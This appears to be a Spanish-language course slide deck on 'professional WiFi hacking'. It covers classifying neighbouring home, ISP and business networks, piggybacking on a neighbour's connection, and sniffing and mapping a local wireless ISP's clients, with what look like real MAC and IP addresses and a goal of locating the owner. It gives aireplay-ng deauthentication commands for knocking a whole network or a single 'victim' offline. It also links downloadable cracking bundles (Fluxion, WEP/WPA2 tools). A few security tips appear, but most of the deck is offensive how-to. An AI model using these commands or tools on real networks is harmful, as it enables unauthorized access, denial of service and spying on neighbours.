Вы находитесь на странице: 1из 88

HACKING WIFI

PROFESIONAL
NIVEL 0
HARDWARE
Adaptadores Wifi

Cómpralo en:

Kasens G900
Adaptadores Wifi

Wifisky
¿watts? ¡el mas potente!

Cómpralo en:
Adaptadores Wifi

Cómpralo en:

Melón
Conexión Exitosa

-1

Alfa 1 watts

-59
Redes de Casa

www.treeknow.com
Conexión Exitosa

-1

Alfa 1 watts

-55
Redes WISP
-50
-45

www.treeknow.com
Conexión Exitosa
TP-Link 7200ND
-1

-83
Redes de Casa

www.treeknow.com
Conexión Exitosa
TP-Link 7200ND
-1

-75
Redes WISP
-68
-59

www.treeknow.com
www.treeknow.com
Opcional
http://files.metageek.net/downloads/inSSIDer4-installer.msi

www.treeknow.com
http://www.mediafire.com/file/rqfg6jsf4ojtffv/acri.rar

www.treeknow.com
www.aprende64.com
NIVEL 1
Wifi Identify

www.treeknow.com
IDENTIFICAR REDES
DE CASA

www.treeknow.com
1

ESSID

Essid de Casa es el resultado de usar un nombre


que no tenga referencia a Empresas

www.treeknow.com
2

MAC ADDRESS

TP-LINK (2007) NUCOM (2014-a) THOMSON


ZTE (2008) (2013) ARRIS (2014-a) MISTRASTAR (2015-a)
ZYXEL (2009) ASKEY (2015-a) 2 WIRE (2011)
HUAWEI (2008) COMTREND SPEEDTOUCH (2007)

www.treeknow.com
3

CHANNEL

Canales de casa son: 1, 6, 11.

www.treeknow.com
4

POWER

1. Conexión exitosa con señal baja.


2. Cantidad de usuarios.

www.treeknow.com
5

MAX RATE

1. Ancho de banda del Router. (> 54)


2. Calcula el tiempo de vida.
3. Identificamos Low, normal, fast.

www.treeknow.com
www.aprende64.com
IDENTIFICAR REDES
DE REPARTIDORES

www.treeknow.com
1

ESSID

Essid de WISP es el resultado de usar un nombre


que tenga referencia a Empresas + Numero Telefónico

www.treeknow.com
2

MAC ADDRESS

UBIQUITI ZCOM
SENAO COMPEX
EDIMAX
PROWARE TP-LINK

www.treeknow.com
3

CHANNEL

Canales de repartidores son:


2, 3, 4, 5, 7, 8, 9, 10, 12, 13

www.treeknow.com
4

POWER

1. Conexión exitosa con señal Alta.


2. Muchos clientes (usuarios).

www.treeknow.com
5

MAX RATE

1. Ancho de banda del Router. (11,54)


2. Calcula el tiempo de vida.
3. Identificamos Low, normal, fast.

www.treeknow.com
www.aprende64.com
IDENTIFICAR REDES
DE EMPRESAS

www.treeknow.com
1

ESSID

Son Essid que tenga referencia a Empresas


y que no tenga numero de teléfono

www.treeknow.com
2

MAC ADDRESS
Destacados

NETGEAR AZTECH
ASUS BUFFALO
LINKSYS
CISCO
D-LINK

www.treeknow.com
3

CHANNEL

Canales de empresas son:


todos los canales

www.treeknow.com
4

POWER

1. Conexión exitosa con señal Alta.


2. Muchos clientes (usuarios).

www.treeknow.com
5

MAX RATE

1. Ancho de banda del Router. (> 54)


2. Calcula el tiempo de vida.
3. Identificamos Low, normal, fast.

www.treeknow.com
www.aprende64.com
linSSID

1. sudo add-apt-repository ppa:wseverin/ppa


2. sudo apt-get update
3. sudo apt-get install linssid

www.treeknow.com
Debugging

www.treeknow.com
COMPARTIR INTERNET
EN TODA TU CASA
PARTIENDO DE UNA RED VECINA

www.treeknow.com
REQUERIMIENTOS

1. Tener acceso vía WIFI a esa RED


2. Contar con un AP TP-LINK WA701ND

www.treeknow.com
TP-LINK WA701ND

www.treeknow.com
Antena Indoor
Alcance
Antena Propia
TP-LINK WA701ND

20 Metros

¿Solo la TP-LINK?

Antena Propia
ADAPTADOR WIFI

30 Metros
www.treeknow.com
Zona urbana
Alcance
Antena Panel
TP-LINK WA701ND

500 metros

Antena Panel
ADAPTADOR WIFI

700 metros

www.treeknow.com
www.treeknow.com
www.treeknow.com
www.aprende64.com
COMPARTIR INTERNET
EN TODA TU CASA
PARTIENDO DE UNA RED VECINA

www.treeknow.com
Requisitos

REQUERIMIENTOS

1. Tener Laptop (por su wifi interno)

¿Serian 2 receptores WIFI?

www.treeknow.com
Lógica
¿Cómo comparte?

internet
Laptop WIFI recibe

internet
Laptop WIFI reparte

www.treeknow.com
Compartir
Comandos

1. netsh wlan set hostednetwork mode=allow ssid=hp1551 key=12345678


2. netsh wlan start hostednetwork

www.treeknow.com
NIVEL 3
INGENIERIA INVERSA WIFI

www.treeknow.com
OBSERVACIÓN

En el nivel 01 (curso 03) -> Curso 04

www.treeknow.com
REBUILD WISP
Reconstruyendo la información.

Información

www.treeknow.com
LÓGICA
Black information Information Gray Information White

Reconstructed

www.treeknow.com
1 Pentesting Externo

CLIENTE WISP

01. Clase C: 192.168.0.0/24 95% | Clase A: 10.0.0.0/24 5%


02. Marcas mas usadas. TP-LINK 95% y UBIQUITI 5%
03. Solo puedes hacer spoofing a Mac Inalámbricas

www.treeknow.com
1 Pentesting Externo

CLIENTES TP-LINK
Mac Antiguas
0023CD
002586
002719
2009 001D0F
al
2012 002127
F4EC38
D85D4C
940C6D

www.treeknow.com
4 Pentesting Externo

CLIENTE WISP

¿Cual es la MAC de los clientes? ¿Qué paginas ingresan los clientes?


¡Mac Address! ¡Sniffing!

IP & Segmentos usados por los clientes Tips de Seguridad Informática


¡IPs & Segmentos! ¡Security!

https://www.wireshark.org/download.html
www.treeknow.com
4 Pentesting Externo

¿Qué modem usan?


¿Qué marca les puso su ISP?
¡fingerprinting!
¿Cuál es su dirección IP?
¿Cómo rastrear la casa del dueño?
¡Localización Exacta!
¿Cuál es su proveedor ISP?
¡ISP!

Defacement SSID ¿Cómo securizamos estos fallos?


¡Defacing! ¡Security!

https://www.wireshark.org/download.html
www.treeknow.com
4 Pentesting Externo

EMISORES WISP
¿IPs de los Servidores WISP?
Con que Equipos reparten internet
¡Fingerprinting!
¡marca del kit emisor!

Torre WISP

Reconstruyendo topología de Red


IPs y segmentos usados por los emisores ¡Infraestructura WISP!
¡IPs & Segmentos!

Dueño
Defacement SSID WISP Tips de Seguridad WISP
¡Defacing! ¡Seguridad!
https://www.wireshark.org/download.html

www.treeknow.com
5 Clientes WISP Segmento de los Emisores (192.168.1.x)
PROWARE UBIQUITI NANOSTATION M5
Pentesting Externo
1 3
192.168.1.5 3 192.168.1.250
F4:EC:38:C1:48:3B (TP-LINK) 6C:FD:B9:9F:FD:36 DC:9F:DB:46:85:65 F8:D1:11:C5:47:02 (TP-LINK)

Facebook Yahoo
USER Google Hotmail MYPC
Facebook

192.168.3.31 192.168.3.35
2 4

D8:5D:4C:D5:29:C6 (TP-LINK) Torre WISP 6C:FD:B9:9F:F2:6D (PROWARE)


Terra Facebook
Google Perú
ANAIS-PC Facebook Youtube MYPC
eonline.com

192.168.3.36 192.168.3.43

Segmento del dueño (192.168.5.x) Galaxy Young GT-S6310L Segmento de los clientes (192.168.3.x)
192.168.5.61
1
04:1B:BA:F2:41:EB 2
ISP MOVISTAR
DNS: 200.48.225.130 RB750 Mikrotik Mikrotik OS 4.17 MFBP-JCXL
DNS: 200.48.225.146
Gateway
Router
ZYXEL (Controla el Bandwidth)
LG SMART TV 32LN570B-SH
(Arcadyan)
Hotspot (Portal Cautivo)
Dueño
192.168.5.47 WISP 5 puertos 10/100 WAN o LAN
88:03:55:1A:6B:5F 192.168.5.5 192.168.3.1
D4:CA:6D:8F:91:00
Firewall + Proxy
00:02:CF:E3:42:62
LINUX 3.0.13
www.treeknow.com
3 Reconociendo implementaciones WISP

www.treeknow.com
2 Pentesting Externo

SERVIDORES WISP

01. Usabilidad: MIKROTIK 99% y PFSENSE 1%


02. Fingerprinting a los Servidores (S.O + Versión + IP + Gateway)
03. Reconociendo infraestructura de un WISP ¡Pentest Externo!

www.treeknow.com
3
SEGURIDAD WISP
01. Los WISP no usan contraseña y eso es negligencia.
02. Los WISP usan Seguridad WEP
03. Usar Seguridad WPA2/AES + 12 dígitos (incluya !”#$%&)
04. Desactivar WPS
05. Cambiar la contraseña del modem + contraseña wifi
06. Existe una herramienta llamada FLUXION MODIFICADO 2017

www.treeknow.com
3
SEGURIDAD WISP

Apágalo y préndelo
¡test! Efecto Boomerang
¡DoS!
Fluxion Modificado 2017

Vive a tu lado
¡vecino!

Déjalo entrar
¡espíalo!
Sigue a la Mac
¡encuéntralo!

www.treeknow.com
3

APAGO Y PRENDO

Si lo apago y lo prendo = no hay internet (problema isp)


Si lo apago y lo prendo = si hay internet rápido (tu vecino lammer)

www.treeknow.com
NIVEL 4
DDoS WIFI

www.treeknow.com
Denial Off Service
Windows

www.treeknow.com
https://www.mediafire.com/file/xevjz896xlu1xn7/WWAPRO.rar

Windows
WINDOWS
aireplay-ng -0 0 -a Mac Empresa -x 150 127.0.0.1:1 (tumbar toda la red)
Opcional
aireplay-ng -0 0 -a Mac Empresa -c Mac Victima -x 150 127.0.0.1:1
(solo a la victima)

www.treeknow.com
Kali Linux

www.treeknow.com
1
No es captura de paquetes, es captura de tráfico

www.treeknow.com
1
No es captura de paquetes, es captura de tráfico

www.treeknow.com
1

Comando 04
Comando 05

Kali Linux
aireplay-ng -0 0 -a Mac Empresa -x 150 wlan0mon (tumbar toda la red)
Opcional
aireplay-ng -0 0 -a Mac Empresa -c Mac Victima -x 150 wlan0mon
(solo a la victima)

www.treeknow.com
NIVEL 5
Hacking Wep, Wpa, Wpa2

www.treeknow.com
Hacking Opn
Windows

www.treeknow.com
Hacking Opn y Wep
Windows

www.treeknow.com
https://www.mediafire.com/file/xevjz896xlu1xn7/WWAPRO.rar

Windows
Hacking Opn, Wep y Wpa2
Kali Linux

www.treeknow.com
1
No es captura de paquetes, es captura de tráfico

www.treeknow.com
1
No es captura de paquetes, es captura de tráfico

www.treeknow.com
1

Comando 04
1

Versión de 64bits
http://www.downloadwireless.net/isos/wifislax64-1.1-final.iso
32 bits VMware (clásica) ¡Ambas son buenas!
https://mega.nz/#!hL4nGLya!VKMRuGwDk1-6i3Xwyh_nL4Ley_17qECy2Geq8mLu9BU
NIVEL 6
Fluxion Modificado WPA2

www.treeknow.com
1
Fluxion Modificado y funciona a la perfección (Es otro)

http://www.mediafire.com/file/l8jgspg9r16tt79/Fluxion_master.zip
NIVEL 6
Hacking Router & Modem

www.treeknow.com
https://github.com/trustedsec/social-engineer-toolkit
¡Aunque ya esta instalado en Kali Linux!
https://github.com/Ettercap/ettercap/archive/v0.8.2.tar.gz
¡Aunque ya esta instalado en Kali Linux!
NIVEL 7
Hacking Wps y nuevas tools

www.treeknow.com